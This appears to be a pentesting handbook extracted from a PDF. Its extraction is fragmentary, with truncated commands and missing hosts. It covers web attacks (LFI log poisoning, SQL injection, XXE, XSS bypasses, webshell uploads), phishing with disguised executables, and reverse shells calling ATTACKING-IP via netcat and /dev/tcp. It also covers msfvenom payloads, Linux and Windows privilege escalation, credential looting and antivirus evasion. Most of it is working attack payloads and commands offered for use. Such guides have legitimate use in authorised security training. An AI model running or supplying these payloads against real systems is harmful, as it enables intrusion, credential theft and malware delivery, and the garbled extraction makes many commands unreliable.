/usr/local/apache/logs/access. log
Proc files
"Under Linux, /proc includes a directory for each running process, including kernel processes, in
directories named /proc/PID, where PID is the process number. Each directory contains information
about one process, including: /proc/PID/cmdline, the command that originally started the process."
LFI to shell
Under the right circumstances you might be able to get a shell from a LFI
Log poisoning
There are some requirements. We need to be able to read log files. In this example we are going to
poison the apache log file. You can use either the success.log or the error.log
Attacking the System
So once you have found a LFI vuln you have to inject php-code into the log file and then execute it.
nc 80
GET /<?php passthru($_GET['cmd']); ?> HTTP/1.1
Connection: close
You can also add it to the error-log by making a request to a page that doesn't exists
nc 80
GET /AAAAAA<?php passthru($_GET['cmd']); ?> HTTP/1.1
Connection: close
GET / HTTP/1.1
Referer: <? passthru($_GET[cmd]) ?>
Connection: close
Now you can request the log-file through the LFI and see the php-code get executed.
Proc files
If you can read the proc-files on the system you might be able to poison them through the user-agent.
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
Attacking the System
In order to retrieve the systems password hashed we need two files: system and SAM. Once you have
those two files you can extract the hased using the kali tool pwdump, like this:
The system and SAM files can be found in different locations, so try them all. From a webserver the
path might be case-sensitive, even though it is windows. So consider that!
This is the definitive guide to Local File inclusion
And this
And this:
Attacking the System
Attacking the System
A remote file inclusion vulnerability lets the attacker execute a script on the target-machine even
though it is not even hosted on that machine.
RFI's are less common than LFI. Because in order to get them to work the developer must have edited
the php.ini configuration file.
$incfile = $_REQUEST["file"];
Now what you can do is to include a file that is not hosted on the victim-server, but instead on the
attackers server.
So when the victim-server includes this file it will automatically execute the commands that are in the
evil.txt file. And we have a RCE.
Avoid extentions
Remember to add the nullbyte %00 to avoid appending .php. This will only work on php before
version 5.3.
If it does not work you can also add a ?, this way the rest will be interpreted as url parameters.
Attacking the System
Differ from LFI in the aspect that LFI can execute code, while a Directory Traversal Attack cannot.
Attacking the System
There is essentially no way for a user to know which files are found in which directories on a web-
server, unless the whole server has directory listing by default. However, if you go directly to the page
it will be shown. So what the attacker can do is to brute force hidden files and directories. Just test a
bunch of them. There are several tools for doing this. The attack is of course very noisy and will show
up fast in the logs.
Insert your target. Add it to the context Click the plus-sign Click on Forced Browse
wfuzz -h
Attacking the System
Attacking the System
# Post
./ -r request.txt -p username
# Get
sqlmap -u "" --dbms=mysql
# Crawl
sqlmap -u --dbms=mysql --crawl=3
if ($_POST['uname'] != ""){
$username = $_POST['username'];
$password = $_POST['password'];
$query = "SELECT * FROM users WHERE username = '$username' AND password='$
$result = mysql_query($query);
$row = mysql_fetch_array($result);
So the user input is not filtered or sanitized in any way. Which means that what the users puts in in the
login-form will be executed my mysql. So just like in xss-injections we just try to escape the input
field to be able to execute sql-commands. So if we input the following into the user-field and
password-field in the login:
whatever' or '1'='1
whatever' or '1'='1
$query = "SELECT * FROM users WHERE username = 'whatever' OR '1'='1' AND passw
Since they both become true the database will retrieve all users and we will be able to bypass the
If you know the username you could of course use that and then only inject on the password
Attacking the System
Sqlmap is a great tool to perform sql-injections. Here is the manual.
So you need to authenticate before you can access the vulnerable paramter.
You just cature the request using burp suite, and save the requiest in a file. Then your run
sqlmap -r request.txt
Here we are dumping the database Webapp and the table Users.
Use proxy
Proxy credencials
Login bypass
This is the most classic, standard first test:
' or '1'='1
' '
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
Attacking the System
" "
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
Sql-injections manually
Sqlmap is good, but it is not very stealthy. And it can generate a lot of traffic. And also it is good to
understand the vulnerability in the cote and not just run tools. So let's learn sql-injections the manual
The two main ways for perform a sql-injection: error based or blind.
Error-bases DB enumeration
If we manage to find an error-message after a broken sql-query, we can use that to try to map out the
database structure.
So first we should try to break the sql-syntaxt by adding a '. We should first ad a ' or a ".'
If the page then returns a blank page or a page with a sql-error we know that the page it vulnerable.
Order by 1 means sort by values of the first column from the result set. Order by 2 means sort by
values of the second column from the result set.
Attacking the System
So it is basically just a tool to order the data in a table. But we can use it to find out how many
columns a table has. Because if we do order by 10 when there really only is 9 columns sql will throw
an error. And we will know how many columns the table has.
So you just increase the number (or do a binary tree search if you want tot do it a bit faster) until you
get an error, and you know how many columns the table has.
Now we need to know which coolumns are being outputed on the webpage. It could be that not all
data from the database is worthwhile to output, so maybe only column 1 and 3 are being outputted to
the website.
To find out which columns are being outputted we can use the union select command. So we do the
command like this
For all the columns that exists. This will return the numbers of the columns that are being outputted
on the website. Take note of which these columns are.
Now we can use that field to start outputing data. For example if columns number five has been
visible in step 3, we can use that to output the data.
Here is a list of data we can retrieve from the database. Some of the syntaxes may difference
depending on the database engine (mysql, mssql, postgres).
# Get version union select 1,2,3,4,version(),6,7,8,9
# Get content from the users-table. From columns name and password. The 0x3a o
Attacking the System
Blind sql-injection
We say that it is blind because we do not have access to the error log. This make the whole process a
lot more complicated. But it is of course still possible to exploit.
Using sleep
Since we do not have access to the logs we do not know if our commands are syntaxically correct or
not. To know if it is correct or not we can however use the sleep statement.
If it lods for four seconds exta we know that the database is processing our sleep() command.
The good part about mysql from a hacker-perspective is that you can actaully use slq to write files to
the system. The will let us write a backdoor to the system that we can use.
Load files
Write files
MSSQL - xp_cmdshell
Mysql does not make comparisons in binary mode. This means that "admin" and "admin " are
the same.
If the username column in the database has a character-limit the rest of the characters are
truncated, that is removed. So if the database has a column-limit of 20 characters and we input a
string with 21 characters the last 1 character will be removed.
With this information we can create a new admin-user and have our own password set to it. So if the
max-length is 20 characters we can insert the following string
Attacking the System
admin removed
This means that the "removed" part will be removed/truncated/deleted. And the trailing spaces will be
removed upon insert in the database. So it will effectively be inserted as "admin".
Attacking the System
Nosql-databases like MongoDB is becoming more and more common. So this needs to be expanded.
Login bypass
Basically change the query to this.
Attacking the System
Common with file-uploading functionality. For files that uses XML, like: docx, pptx, gpx, pdf
and xml itself.
Background XML
XML is a markup language, like HTML. Unlike HTML is does not have any predefined tags. It is the
user that create the tags in the XML object. XML is just a format for storing and transporing data.
XML uses tags and subtags, just like html. Or parents, children, and syblings. So in that sense it has
the same tree-structure as html.
<?xml version="1.0"?>
<text>Hello World</text>
Syntax rule
Attacking the System
So if an application receives XML to the server the attacker might be able to exploit an XXE. It could
be sent as a GET, but it is more likely that it is send in a POST. An attack might look like this:
The elemet can be whatever, it doesn't matter. The xxe is the "variable" where the content of
/dev/random get stored. And by dereferencing it in the foo-tag the content gets outputted.This way an
attacker might be able to read files from the local system, like boot.ini or passwd. SYSTEM means
that what is to be included can be found locally on the filesystem.
In php-applications where the expect module is loaded it is possible to get RCE. It is not a very
common vulnerability, but still good to know.
Even if the data is not reflected backto the website it is still possible to exfiltrate files and data from
the server. The technique is similar to how you exfiltrate the cookie in a Cross-Site Scripting attack,
you send it in the url.
Test for it
Input is reflected
If "testdata" gets reflected then it is vulnerable to XXE. If it gets reflected you can try to exfiltrate the
data the following way:
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Another way to test it is to see if the server tries to download the external script. Firs t you need to set
up your own webserver, and then wait for it to connect.
Attacking the System
Rename it
We can rename our shell and upload it as shell.php.jpg. It passed the filter and the file is executed as
If they check the content. Basically you just add the text "GIF89a;" before you shell-code. So it would
look something like this:
system($_GET['cmd']);//or you can insert your complete shell code
In image
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg
Exiftool is a great tool to view and manipulate exif-data. Then I had to rename the file
mv lo.jpg lo.php.jpg
References http://repository.root-
Attacking the System
Attacking the System
Attacking the System
Password reset
The host-header ca sometimes be parsed in the code and used for creating links. So if the host-header
is used for creating the password reset link it is possible for an attacker to steal the reset-token. The
attacker just needs to enter the victims email-address in the password reset field, then intercept the
request and change the host-header to some address that the attacker controls. When the victim
recieves the password reset link they will click on it, which will direct the link to the attackers site,
which enables the attacker to steal the reset token, since it will be stored in the url that the user clicks.
Attacking the System
Deserialization attacks
Attacking the User
HackerOne issues
Relevant hackerone reports:
This attack is really similar to to Cross-Site Scripting attacks.
Create a fake login-page, that tricks the user to log in again, but the post-is sent to a server that
the attacker controls. And can thereby steal the credentials of the user.
Inject javacript.
Injecting Javascript
Javascript can be injected into html-tags, which can be used to steal cookies and other things.
Injecting HTML
The attacker can inject html forms that tricks the user into giving up sensitive data.
Insecure Direct Object Reference (IDOR)
Imagine that you know anothers username , then you can just change the username and be able to
change the password for that user. The data you can access can be anything, maybe private comments,
messages, images, user data.
How to discover
If you have access to the source-code that is an easy way to do it. Check the sections where restricted
data is presented. And see if there is any access-control in that code.
Subdomain Takeover
Subdomain Takeover
Subdomain Takeover
This is a really cool attack.
First you looks for all subdomains. Sometimes a company has forgotten about a subdomain. Like and
old support system called And then the support-system that points to
that domain gets removed. That means that we could start a service for support, and like it to that
domain. And thereby controlling the domain.
HackerOne reports
Cross Site Request Forgery
2. Construct your malicious URL Now you just construct the URL. Either using get or post.
3. GET If you use only GET you can construct the URL like this:
If the requests are sent as POST you need to make the victim run a link that where you control the
server. So that you can add the arguments in the body.
There is one creat trick for this. It is to use the image-tag. Because the image-tag can be used to
automatically retrieve information from other sites. If you have an image on your site but it is
referenced to
The only real solution is to use unique tokens for each request.
Cross Site Request Forgery
Cross-Site Scripting
Cross-Site Scripting
Cross-site-scripting, or XSS as it is sometimes abbreviated to, is an attack that let's the attacker
execute javascript code in the browser of the victim.
1. Complete control over the browser The attacker can access plugins. Like password managers.
The attacker can trick the user into allowing webcam or audio.
2. Session-hijacking/Cookie theft This is when the attacker steals the cookie that is saved in the
browser. Using this cookie the attacker can log in to the service as the victim, and thereby gain
access to his/her account. If the victim is an admin that has extended privileges (uploading
code, images, or whatever) this could lead to a compromise of the server itself.
3. Keylogger The attacker can execute a keylogging-script that steals everything the user inputs in
the website. This could be used to steal sensitive information, like passwords, credit cards
information, chatlogs or whatever the user inputs.
4. Phishing The attacker can insert a fake login. Image that you visit a site, and from that site you
are able to login using your facebook or google-account. The attacker could spoof that so that
when you enter your credentials, they are then sent to the attacker.
5. Browser exploits The script can redirect to a another page that issues an attack against the
browser, possibly leading to total takeover of the machine.
Types of XSS
1. Persistent This is when the malicious code originates from the websites database. That means
the attacker has managed to insert malicious code into the database. So every time the database
serve that data the script will me executed. this is probably the most dangerous XSS, since it
does not need to rely on social engineering.
2. Reflected This is an attack where the script originates from the users request. This might seem a
bit illogical, why would a user inject malicious code to himself? Well the code can
3. DOM based DOM-based attacks are when something is injected into javascript on the DOM.
So, it does not go by the server. Because the code gets executed in the response. Take a search-
functionality for example. The users enters a search-parameter that gets sent to the server which
might sanitize it or something. In the response the found search-items are sent, but not the
search-query. But on the webpage the search query is exposed. "You searched for X" is shown.
That is because it gets the search parameter from the url-parameter. By using
document.location.href for example.
Cross-Site Scripting
After starting it up you can log in to the panel. Then you get someone to execute the hook. Hook
<script src=""></script>
Protect yourself
The problem with XSS is that it is a bit hard for the users to protect themselves. If there is a problem
witht the website there is not that much the user can do.
One can always use noscript to block all javascript code. But that pretty much destroys the whole
experience with using the internet.
There are mainly two ways to protect against encoding and sanitizing .
You can also set the response-header like this: -xss-protection:"1; mode=block"
xsser --gtk
Cross-Site Scripting
Cross-Site Scripting
This is a good list:
No security
Imagine that the server sanitizes <script>. To bypass that we can use: <SCrIpt>alert(2)
</ScRiPt> <script type=text/javascript>alert(2)</script>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG onmouseover="alert('xxs')">
<a onmouseover="alert(2)">d</a>
Cross-Site Scripting
DOM-based XSS
DOM-based XSS
In DOM-based XSS the malicious code is never sent to the server. The injection-point is somewhere
where javascript has access.
The user is able to control the URL with the help of the hash-symbol #. If we add that symbol to a
URL the browser will not include that characters that comes after it in the requet to the server.
# will generate this output:
So in order to inject and execute a DOM-based XSS we need a injection-point (called source) and a
point of execution (called sink).
In the example above document.URL is our source. Example of other sources are:
document.URLUnencoded (IE 5.5 or later Only)
Cross-Site Scripting
Finding it
To find DOM-based XSS you will need to check out the code.
If the javascript code is bundled and minified you can use js_beautify to make it readble again.
Browser Vulnerabilities
Browser Vulnerabilities
Browser vulnerabilities
We have mostly been looking at vulnerabilities found in sites that let's us either attack the user or the
underlying system. But there is also another sort of vulnerability. When the browser itself is
vulnerable and can lead to remote code execution.
Foe example, if the attacker is able to inject code html or javascript the attacker can redirect the user
to load another page.
One technique is to hide the redirection in a frame, this way the user won't even notice that an
external page is being loaded.
A less subtle technique is by just redirecting the user, with a script like this:
Automated Vulnerability Scanners
dpkg -i nameOfFile
Start it
/etc/init.d/nessusd start
Run all default scripts together with a port-scan. These scripts could possibily crash certain servers.
Causing a denial-of-service. So never run this on production servers.
Nmap has categoriesed their scripts into several different categories to make it easier to run a few of
them together
Automated Vulnerability Scanners
If you are on Kali linux you have to firt run the initial setup scripts, like this
Make sure to write down the password that the initialisation-scripts gives you
This will download some stuff and start setting everything up. WHen everything is set up you go to
the web-interface:
nikto -h
uniscan -h
Metasploit - Wamp
Found in metasploit
load wamp
So you have done your homework, and done your vulnerability analysis and found several
vulnerabilities. Now it is time to exploit them.
Before you start writing your own exploits you should of course check if there are some already
Do not just grab any exploit on the internetz. If it contains shellcode it might be you that is getting
hacked. On Exploit-db and Security focus they vet the exploits before they are published so it is at
least a bit more secure. But be paranoid, and don't trust shellcode or code that you didn't write.
Social Engineering - Phishing
<meta http-equiv="refresh" content="0; url=shell53.exe">
Of course the user will have to accept to download the file, unless the user has previously checked in
the box automatically download. The user must then click the file for it to execute. This is where the
social engineering part comes in, you really must trick the user into executing the file.
Since windows by default remove the filename you can call your file shell.jpg.exe, and once
downloaded onto the machine windows will display it as "shell.jpg".
This code can be modified to greate a wget-script and then download and execute a script.
Social Engineering - Phishing
The most common tool for social engineering is to use Social Engineering Toolkit. SET. It comes as
default in Kali. Run it like this:
Spear phishing
Word/excel makros
An explanation of how to createa malicious makro-wordfile.
Default Layout of Apache on Different Versions
This is s great collection of different types of reverse shells and webshells. Many of the ones listed
below comes from this cheat-sheet:
There is an important difference between non-staged and staged payload. A non-staged shell is sent
over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler.
But also with netcat.
staged shells send them in turn. This can be useful for when you have very small buffer for your
shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts
of it and sets up the connection, and then it sends some more. This can be caught with metasploit
multi-handler but not with netcat.
Standard meterpreter
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Meterpreter HTTPS
It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is
encrypted and can be used to bypass deep-packet inspections.
Non-staged payload
use exploit/multi/handler
set payload windows/shell_reverse_tcp
Staged payload
This must be caught with metasploit. It does not work with netcat.
use exploit/multi/handler
set payload windows/shell/reverse_tcp
Bind shell
nc -vlp 5555 -e /bin/bash
nc 5555
# Windows
nc.exe -nlvp 4444 -e cmd.exe
Reverse shell
# Linux
nc -lvp 5555
nc 5555 -e /bin/bash
# Windows
nc -lvp 443
nc.exe 443 -e cmd.exe
With -e flag
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
Without -e flag
Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is
encryption. If you are on a pentestjob you might not want to communicate unencrypted.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while
This php-shell is OS-independent. You can use it on both Linux and Windows.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f a
A webshell is a shell that you can access through the web. This is useful for when you have firewalls
that filter outgoing traffic on ports other than port 80. As long as you have a webserver, and want it to
function, you can't filter our traffic on port 80 (and 443). It is also a bit more stealthy than a reverse
shell on other ports since the traffic is hidden in the http traffic.
This code can be injected into pages that use php.
# Exec() does not output the result without echo, and only output the last lin
<?php echo exec("whoami");?>
# Instead to this if you can. It will return the output as an array, and then
<?php exec("ls -la",$array); print_r($array); ?>
# Using backticks
<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>
# Using backticks
<?php echo `whoami`; ?>
You can then call then execute the commands like this:
Make it stealthy
We can make the commands from above a bit more stealthy. Instead of passing the cmds through the
url, which will be obvious in logs, we cna pass them through other header-paramters. The use
tampterdata or burpsuite to insert the commands. Or just netcat or curl.
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run(" cmd.exe /c c:\Inetpub\shell443.exe",0,True)
Generate Shellcode
Generate Shellcode
Generate shellcode
An easy way to generate shellcode is by using msfvenom or msconsole. I mostly see people
recommending msfvenom online, but I think msfconsole can be a bit easier to work with. But of
course it is the same thing, just different interfaces.
In msfconsole you have the keyword generate that help us generate shellcode. So first we have to
select a payload.
use payload/windows/shell_reverse_tcp
use payload/windows/exec
use payload/cmd/windows/generic
Editing Exploits
Editing Exploits
Editing exploits
We often find exploits that do not work out of the box. Typical problems we encounter are:
Compiling windows exploits
For 32bit
Post Exploitation
Post Exploitation
Post Exploitation
In order to move horizontally on the network we need to know as much about the machine as
possible. We need to loot it. These are some things that must be done on every compromised machine.
Tcp dump
It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the
Spawning Shells
Spawning Shells
Spawning shells
Non-interactive tty-shell
If you have a non-tty-shell there are certain commands and stuff you can't do. This can happen if you
upload reverse shells on a webserver, so that the shell you get is by the user www-data, or similar.
These users are not meant to have shells as they don't interact with the system has humans do.
So if you don't have a tty-shell you can't run su, sudo for example. This can be annoying if you
manage to get a root password but you can't use it.
Anyways, if you get one of these shells you can upgrade it to a tty-shell using the following methods:
Using python
echo 'os.system('/bin/bash')'
/bin/sh -i
/bin/bash -i
From within VI
Interactive tty-shell
So if you manage to upgrade to a non-interactive tty-shell you will still have a limited shell. You
won't be able to use the up and down arrows, you won't have tab-completion. This might be really
frustrating if you stay in that shell for long. It can also be more risky, if a execution gets stuck you
cant use Ctr-C or Ctr-Z without killing your session. However that can be fixed using socat. Follow
these instructions.
Spawning Shells
Meterpreter for Post-Exploitation
So just create a meterpreter-shell from msfvenom or something like that. Maybe a php-shell. Or
whatever you have access to. Then you just fire that script and get your meterpreter shell. Check out
the chapter Exploiting/Msfvenom for more about creating payloads.
List all commands
help upload
So first some basics. You can put the shell into a background job with the command background.
This might be useful if you have several shells going at the same time. Or if you want to move to a
specific directory to upload or download some files.
background -l
background -i 1
A really common and useful script that is build into metasploit is the migrate script. If you get the
shell through some kind of exploits that crashes a program the user might shut down that program and
it will close your session. So you need to migrate your session to another process. You can do that
with the migrate script.
Meterpreter for Post-Exploitation
Post modules
There are tons of modules specifically created for post-exploitation. They can be found with
use post/
There is a point in doing stuff through metasploit. For example, if you find a exploit that does not
have meterpreter available as a payload you can just start a normal shell and then upgrade it. To do
that you do the following:
First you generate a shell through metasploit, either through a specici exploit or through a msfvenom-
shell that you upload. Now that you have a normal shell it is time to upgrade it to a meterpreter shell.
Background session 2? [y/N] y
Now we have that shell running in the background, and you can see it with
show sessions
sessions -l
sessions -i 1
use post/multi/manage/shell_to_meterpreter
set session 1
Now metasploit will create a new session with meterpeter that will be available to you.
Privilege Escalation - Linux
In this chapter I am going to go over these common Linux privilege escalation techniques:
Kernel exploits
Programs running as root
Installed software
Weak/reused/plaintext passwords
Inside service
Suid misconfiguration
Abusing sudo-rights
World writable scripts invoked by root
Bad path configuration
Unmounted filesystems
Enumeration scripts
I have used principally three scripts that are used to enumerate a machine. They are some difference
between the scripts, but they output a lot of the same. So test them all out and see which one you like
-k Enter keyword
-e Enter export location
-t Include thorough (lengthy) tests
-r Enter report name
-h Displays this help text
Unix privesc
Run the script and save the output in a file, and then grep for warning in it.
Privilege Escalation - Linux
Kernel Exploits
By exploiting vulnerabilities in the Linux Kernel we can sometimes escalate our privileges. What we
usually need to know to test if a kernel exploit works is the OS, architecture and kernel version.
Kernel version:
uname -a
cat /proc/version
cat /etc/issue
Don't use kernel exploits if you can avoid it. If you use it it might crash the machine or put it in an
unstable state. So kernel exploits should be the last resort. Always use a simpler priv-esc if you can.
They can also produce a lot of stuff in the sys.log. So if you find anything good, put it up on your
list and keep searching for other ways before exploiting it.
The idea here is that if specific service is running as root and you can make that service execute
commands you can execute commands as root. Look for webserver, database or anything else like
that. A typical example of this is mysql, example is below.
# Metasploit
# Linux
ps aux
If you find that mysql is running as root and you username and password to log in to the database you
can issue the following commands:
select sys_exec('whoami');
select sys_eval('whoami');
Has the user installed some third party software that might be vulnerable? Check it out. If you find
Privilege Escalation - Linux
# Debian
dpkg -l
# OpenBSD, FreeBSD
Weak/reused/plaintext passwords
./ -t -k password
It might be that case that the user is running some service that is only available from that host. You
can't connect to the service from the outside. It might be a development server, a database, or anything
else. These services might be running as root, or they might have vulnerabilities in them. They might
be even more vulnerable since the developer or user might be thinking "since it is only accessible for
the specific user we don't need to spend that much of security".
Check the netstat and compare it with the nmap-scan you did from the outside. Do you find more
services available from the inside?
# Linux
netstat -anlp
netstat -ano
Privilege Escalation - Linux
When a binary with suid permission is run it is run as another user, and therefore with the other users
privileges. It could be root, or just another user. If the suid-bit is set on a program that can spawn a
shell or in another way be abuse we could use that to escalate our privileges.
For example, these are some programs that can be used to spawn a shell:
If these programs have suid-bit set we can use them to escalate privileges too. For more of these and
how to use the see the next section about abusing sudo-rights:
#Find SUID
find / -perm -u=s -type f 2>/dev/null
#Find GUID
find / -perm -g=s -type f 2>/dev/null
Abusing sudo-rights
If you have a limited shell that has access to some programs using sudo you might be able to
escalate your privileges with. Any program that can write or overwrite can be used. For example, if
you have sudo-rights to cp you can overwrite /etc/shadow or /etc/sudoers with your own
malicious file.
Copy and overwrite /etc/shadow
Privilege Escalation - Linux
From less you can go into vi, and then into a shell.
You need to run more on a file that is bigger than your screen.
sudo perl
exec "/bin/bash";
sudo python
import os
sudo vi
:set shell=/bin/bash:shell
If you find a script that is owned by root but is writable by anyone you can add your own malicious
code in that script that will escalate your privileges when the script is run as root. It might be part of a
cronjob, or otherwise automatized, or it might be run by hand by a sysadmin. You can also check
scripts that are called by these scripts.
Why do people/sysadmins do this? Because they are lazy and won't want to write ./.
This explains it
And here
With privileges running script that are editable for other users.
Look for anything that is owned by privileged user but writable for you:
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Unmounted filesystems
Here we are looking for any unmounted filesystems. If we find one we mount it and start the priv-esc
process over again.
Privilege Escalation - Linux
mount -l
cat /etc/fstab
NFS Share
If you find that a machine has a NFS share you might be able to use that to escalate privileges.
Depending on how it is configured.
If that succeeds then you can go to /tmp/share. There might be some interesting stuff there. But
even if there isn't you might be able to exploit it.
If you have write privileges you can create files. Test if you can create files, then check with your
low-priv shell what user has created that file. If it says that it is the root-user that has created the file it
is good news. Then you can create a file and set it with suid-permission from your attacking machine.
And then execute it with your low privilege shell.
This code can be compiled and added to the share. Before executing it by your low-priv user make
sure to set the suid-bit on it, like this:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
return 0;
Privilege Escalation - Linux
Privilege Escalation - Windows
# Basics
# Who am I?
echo %username%
# Firewall
netsh firewall show state
netsh firewall show config
# Network
ipconfig /all
route print
arp -A
Cleartext Passwords
Search for them
In Files
These are common files to find them in. They might be base64-encoded. So look out for that.
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
In Registry
reg query "HKCU\Software\ORL\WinVNC3\Password"
# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
netstat -ano
Example output:
Privilege Escalation - Windows
Look for LISTENING/LISTEN. Compare that to the scan you did from the outside.
Does it contain any ports that are not accessible from the outside?
If that is the case, maybe you can make a remote forward to access it.
Kernel exploits
Kernel exploits should be our last resource, since it might but the machine in an unstable state or
create some other problem with the machine.
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn
Privilege Escalation - Windows
Python to Binary
If we have an exploit written in python but we don't have python installed on the victim-machine we
can always transform it into a binary with pyinstaller. Good trick to know.
Scheduled Tasks
Here we are looking for tasks that are run by a privileged user, and run a binary that we can overwrite.
This might produce a huge amount of text. I have not been able to figure out how to just output the
relevant strings with findstr. So if you know a better way please notify me. As for now I just
copy-paste the text and past it into my linux-terminal.
Yeah I know this ain't pretty, but it works. You can of course change the name SYSTEM to another
privileged user.
If you find a service that has write permissions set to everyone you can change that binary into
your custom binary and make it execute in the privileged context.
First we need to find services. That can be done using wmci or sc.exe. Wmci is not available on all
windows machines, and it might not be available to your user. If you don't have access to it, you can
use sc.exe.
This will produce a lot out output and we need to know which one of all of these services have weak
permissions. In order to check that we can use the icacls program. Notice that icacls is only
available from Vista and up. XP and lower has cacls instead.
As you can see in the command below you need to make sure that you have access to wimc, icacls
and write privilege in C:\windows\temp.
Binaries in system32 are excluded since they are mostly correct, since they are installed by windows.
Privilege Escalation - Windows
Now you can process them one by one with the cacls command.
cacls "C:\path\to\file.exe"
What we are interested in is binaries that have been installed by the user. In the output you want to
look for BUILTIN\Users:(F). Or where your user/usergroup has (F) or (C) rights.
BUILTIN\Power Users:C
That means your user has write access. So you can just rename the .exe file and then add your own
malicious binary. And then restart the program and your binary will be executed instead. This can be a
simple getsuid program or a reverse shell that you create with msfvenom.
#include <stdlib.h>
int main ()
int i;
i = system("net localgroup administrators theusername /add");
return 0;
Okay, so now that we have a malicious binary in place we need to restart the service so that it gets
executed. We can do this by using wmic or net the following way:
Privilege Escalation - Windows
If your meterpreter session dies right after you get it you need migrate it to a more stable service. A
common service to migrate to is winlogon.exe since it is run by system and it is always run. You can
find the PID like this:
So when you get the shell you can either type migrate PID or automate this so that meterpreter
automatically migrates.
# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |finds
# Using sc
sc query
sc qc service name
If the path contains a space and is not quoted, the service is vulnerable.
Exploit It
c:\Program Files\something\winamp.exe
When the program is restarted it will execute the binary program.exe, which we of course control.
We can do this in any directory that has a space in its name. Not only program files.
Vulnerable Drivers
Some driver might be vulnerable. I don't know how to check this in an efficient way.
Privilege Escalation - Windows
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElev
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElev
First we need to map/mount that drive. In order to do that we need to know the IP-address of the
domain controller. We can just look in the environment-variables
# Output environment-variables
# Look up ip-addres
nslookup nameofserver.whatever.local
# Now we mount it
net use z: \\\SYSVOL
# And enter it
If we find the file with a password in it, we can decrypt it like this in Kali
gpp-decrypt encryptedpassword
If you have a GUI with a user that is included in Administrators group you first need to open up
Privilege Escalation - Windows
cmd.exe for the administrator. If you open up the cmd that is in Accessories it will be opened up as
a normal user. And if you rightclick and do Run as Administrator you might need to know the
Administrators password. Which you might not know. So instead you open up the cmd from
c:\windows\system32\cmd.exe. This will give you a cmd with Administrators rights.
# Now we set the time we want the system CMD to start. Probably one minuter af
at 01:23 /interactive cmd.exe
psexec -i -s cmd.exe
On some machines the at 20:20 trick does not work. It never works on Windows 2003 for
example. Instead you can use Kitrap. Upload both files and execute vdmaillowed.exe. I think it
only works with GUI.
Using Metasploit
So if you have a metasploit meterpreter session going you can run getsystem.
Post modules
Some interesting metasploit post-modules
First you need to background the meterpreter shell and then you just run the post modules.
You can also try some different post modules.
use exploit/windows/local/service_permissions
run post/windows/gather/credential_collector
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
Privilege Escalation - Windows
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/checkvm
Privilege Escalation - Powershell
Escaping Restricted Shell
sh -r
bash -r
bash --restricted
ksh -r http://pen-
Bypassing antivirus
Bypassing antivirus
Bypassing antivirus
So first of all, what is a antivirus program and how does it work?
So what we need to do is to change the malware enough so that the signature changes and the
antivirus is not able to identify the file as malicious.
We can encode our malware in different ways. This can be done with msfvenom. Notice how we set
the -e flag here, and then use the shikata_ga_nai encoding. This is not that effective since
antivirus-vendors have access to metasploit as well.
In order to obfuscate our malware we can encrypt it, and thus radically changing the signature. One
much mentioned tool for doing that is Hyperion. It is a windows binary but we can compile and run it
from linux as well. This worked for me (october 2016)
i686-w64-mingw32-c++ Hyperion-1.2/Src/Crypter/*.cpp -o hyperion.exe
Bypassing antivirus
In Kali you have hyperion 1 included. However for it to work you have to run it from it's correct path.
So go to /usr/share/veil-evasion/tools/hyperion
Loot and Enumerate
If you are on a network with other machines that you still haven't owned, it might be useful to take a
tcp-dump from the machine you have owned. So that you can inspect the traffic between that machine
and the other machines on the network. This might be helpful when attacking the other machines.
So after we have exploited a machine we want to use that machine to learn as much about the network
as possible. To be able to map the entire network. We want to know about switches, firewalls, routers,
other computers, server, etc. We want to know what ports are open, their operating systems.
We also want to look for password that might be reused on other machines, and sensitive information
found in databases. Information about the user might be interesting in order to use social engineering
attacks against other users in the network.
Loot Windows
Loot Windows
Loot Windows
If you have a meterpreter shell you are able to do a lot of thing with very little effort. If you do not
have a meterpreter-shell you can always create a exploit with msfvenom. An elf or exe or other
format to upgrade your shell.
